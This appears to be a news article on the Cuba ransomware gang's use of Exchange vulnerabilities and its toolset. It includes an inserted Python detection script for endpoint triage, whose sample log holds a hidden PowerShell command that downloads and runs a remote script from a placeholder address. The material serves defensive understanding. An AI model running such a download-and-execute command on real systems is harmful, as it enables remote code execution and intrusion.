
Microsoft Exchange servers hacked to deploy Cuba ransomware
The Cuba ransomware operation is exploiting Microsoft Exchange vulnerabilities to gain initial access to corporate networks and encrypt devices. Cybersecurity firm Mandiant tracks the ransomware gang as UNC2596 and the ransomware itself as COLDDRAW. However, the ransomware is more commonly referred to as Cuba, which is how BleepingComputer will reference them throughout this article. Cuba is a ransomware operation that launched at the end of 2019, and while they started slow, they began to pick up speed in 2020 and 2021. This increase in activity led to the FBI issuing a Cuba ransomware advisory in December 2021, warning that the group had breached 49 critical infrastructure organizations in the U.S.

In a new report by Mandiant, researchers show that the Cuba operation primarily targets the United States, followed by Canada. The Cuba ransomware gang has been seen leveraging Microsoft Exchange vulnerabilities to deploy web shells, RATs, and backdoors to establish their foothold on the target network since August 2021. "Mandiant has also identified the exploitation of Microsoft Exchange vulnerabilities, including ProxyShell and ProxyLogon, as an alternate access point leveraged by UNC2596 likely as early as August 2021," explains Mandiant in a new report. The planted backdoors include Cobalt Strike or the NetSupport Manager remote access tool, but the group also uses their own ‘Bughatch’, ‘Wedgecut’, ‘eck.exe’, and ‘Burntcigar’ tools.


Wedgecut comes in the form of an executable named “check.exe”, a reconnaissance tool that enumerates Active Directory through PowerShell. Bughatch is a downloader that fetches PowerShell scripts and files from the C2 server. To evade detection, it loads in memory from a remote URL. Burntcigar is a utility that can terminate processes at the kernel level by exploiting a flaw in an Avast driver, which is bundled with the tool for a “bring your own vulnerable driver” attack.


Finally, there is a memory-only dropper called Termite that fetches the above payloads and loads them. However, this tool has been observed in campaigns of various threat groups, so it is not used exclusively by the Cuba threat actors. The threat actors escalate privileges using stolen account credentials obtained through the readily available Mimikatz and Wicker tools. Then they carry out network reconnaissance with Wedgecut, and next, they move laterally with RDP, SMB, PsExec, and Cobalt Strike. The next deployment is Bughatch, loaded by Termite, followed by Burntcigar, which lays the groundwork for data exfiltration and file encryption by disabling defense tools. The Cuba gang doesn’t use any cloud services for the exfiltration step but instead sends everything to their own private infrastructure.
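The intrusion chain above gives a defender three concrete behaviours to hunt for on endpoints: a reconnaissance binary named check.exe driving PowerShell Active Directory enumeration (Wedgecut), PowerShell pulling a script from a remote URL and running it in memory (Bughatch), and PsExec-style lateral movement. The following Python triage routine, added here as an illustration and not code from the article or from Mandiant, runs those checks over constructed process-creation log lines. The pipe-separated log format, the hostnames, paths and the 203.0.113.5 address are all assumptions made for the example, not a real EDR schema or real indicators.

```python
"""Triage process-creation events for the behaviours attributed to the
Cuba/UNC2596 chain: check.exe -> PowerShell AD enumeration (Wedgecut-like),
PowerShell in-memory download-and-execute (Bughatch-like), and PsExec use.
The log format below (host|parent_image|image|command_line) is a constructed
assumption for this example, not a real Sysmon or EDR schema."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Finding labels returned by triage(); keep them stable so alerts can be grouped.
WEDGECUT = "check.exe driving PowerShell AD enumeration (Wedgecut-like)"
BUGHATCH = "PowerShell executing script fetched from remote URL (Bughatch-like)"
PSEXEC = "PsExec service binary executed (lateral movement)"

# Common AD enumeration primitives reachable from PowerShell.
AD_ENUM = re.compile(r"get-ad(user|computer|group|domain)|adsisearcher|directorysearcher", re.I)
# A remote URL plus an in-memory execution primitive in the same command line.
HAS_URL = re.compile(r"https?://", re.I)
HAS_EXEC = re.compile(r"\b(iex|invoke-expression)\b", re.I)
PSEXEC_IMAGES = {"psexec.exe", "psexec64.exe", "psexesvc.exe"}


@dataclass
class ProcEvent:
    host: str
    parent: str   # parent image path, lower-cased
    image: str    # image path, lower-cased
    cmdline: str


def parse_line(line: str) -> ProcEvent:
    """Parse one constructed host|parent|image|cmdline record."""
    host, parent, image, cmdline = line.rstrip("\n").split("|", 3)
    return ProcEvent(host, parent.lower(), image.lower(), cmdline)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def triage(event: ProcEvent) -> list[str]:
    """Return the list of finding labels that apply to a single event."""
    findings: list[str] = []
    is_powershell = basename(event.image) in {"powershell.exe", "pwsh.exe"}
    # Wedgecut: the reconnaissance binary spawns PowerShell to enumerate AD.
    if is_powershell and basename(event.parent) == "check.exe" and AD_ENUM.search(event.cmdline):
        findings.append(WEDGECUT)
    # Bughatch: script pulled from a remote URL and executed without touching disk.
    if is_powershell and HAS_URL.search(event.cmdline) and HAS_EXEC.search(event.cmdline):
        findings.append(BUGHATCH)
    # PsExec on either the source (psexec.exe) or the target (psexesvc.exe) side.
    if basename(event.image) in PSEXEC_IMAGES:
        findings.append(PSEXEC)
    return findings


def triage_log(text: str) -> list[tuple[str, str]]:
    """Run triage over a whole log; returns (host, finding) pairs in log order."""
    results: list[tuple[str, str]] = []
    for line in text.strip().splitlines():
        event = parse_line(line)
        results.extend((event.host, f) for f in triage(event))
    return results


# Constructed sample log: three suspicious events and one benign one (ws02).
SAMPLE_LOG = r"""ws01|c:\users\bob\check.exe|c:\windows\system32\windowspowershell\v1.0\powershell.exe|powershell -nop -c "Get-ADComputer -Filter *"
ws01|c:\windows\explorer.exe|c:\windows\system32\windowspowershell\v1.0\powershell.exe|powershell -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/s.ps1')"
dc01|c:\windows\system32\services.exe|c:\windows\psexesvc.exe|C:\Windows\PSEXESVC.exe
ws02|c:\windows\explorer.exe|c:\windows\system32\windowspowershell\v1.0\powershell.exe|powershell -c "Get-Date"
"""

if __name__ == "__main__":
    for host, finding in triage_log(SAMPLE_LOG):
        print(f"{host}: {finding}")
```

Each check is deliberately narrow (parent name plus cmdlet, URL plus execution primitive, known service binary names) so it stays explainable to an analyst; in practice the benign PsExec use by administrators is the main source of noise, which is why the result keeps the host so hits can be correlated with the rest of the chain rather than alerted on in isolation.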


Back in May 2021, Cuba ransomware partnered with the spam operators of the Hancitor malware to gain access to corporate networks through DocuSign phishing emails. Since then, Cuba has evolved its operations to focus on vulnerabilities in public-facing services, such as the Microsoft Exchange ProxyShell and ProxyLogon vulnerabilities. This shift makes the attacks more powerful but also easier to thwart, as security updates that fix the exploited issues have been available for many months now. The Cuba operation will likely turn its attention to other vulnerabilities once there are no more valuable targets running unpatched Microsoft Exchange servers. This shows that applying the available security updates as soon as the software vendors release them is key to maintaining a strong security posture against even the most advanced threat actors.

Referring to this as Cuba reads terribly in parts of the article. Otherwise the content is well put together.
